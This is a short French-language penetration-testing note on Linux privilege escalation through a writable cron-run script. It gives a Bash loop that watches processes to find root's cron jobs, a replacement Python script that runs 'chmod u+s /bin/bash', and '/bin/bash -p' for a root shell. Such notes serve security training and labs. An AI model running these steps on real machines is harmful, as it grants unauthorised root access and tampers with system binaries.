Tâches Cron Script Modifié (Python) - Linux Privilege Escalation

Nous créons un script Bash pour analyser les processus en cours et détecter les tâches cron exécutées sur la machine cible :

#!/bin/bash

old_process=$(ps -eo user,command)

while true; do
	new_process=$(ps -eo user,command)
	diff <(echo "$old_process") <(echo "$new_process") | grep "[\>\<]" | grep -vE "script|command|kworker"
	old_process=$new_process
done

En exécutant ce script, nous remarquons que l'utilisateur root est en train d'exécuter un script Python situé dans le répertoire /opt/tmp.py.

Nous avons la possibilité de modifier ce script Python.

Nous le modifions pour ajouter la commande permettant de définir un setuid sur le binaire /bin/bash, ce qui nous permettra d'exécuter un shell Bash avec les privilèges de root :

#!/usr/bin/env python
import os
import sys
try:
     os.system('chmod u+s /bin/bash')
except:
     sys.exit()

Après avoir modifié le script, nous attendons environ une minute pour que la tâche cron s'exécute.

Une fois la tâche cron exécutée, nous pouvons obtenir un shell Bash avec les privilèges root en exécutant la commande suivante :

/bin/bash -p

Mis à jour il y a 11 mois

Ce contenu vous a-t-il été utile ?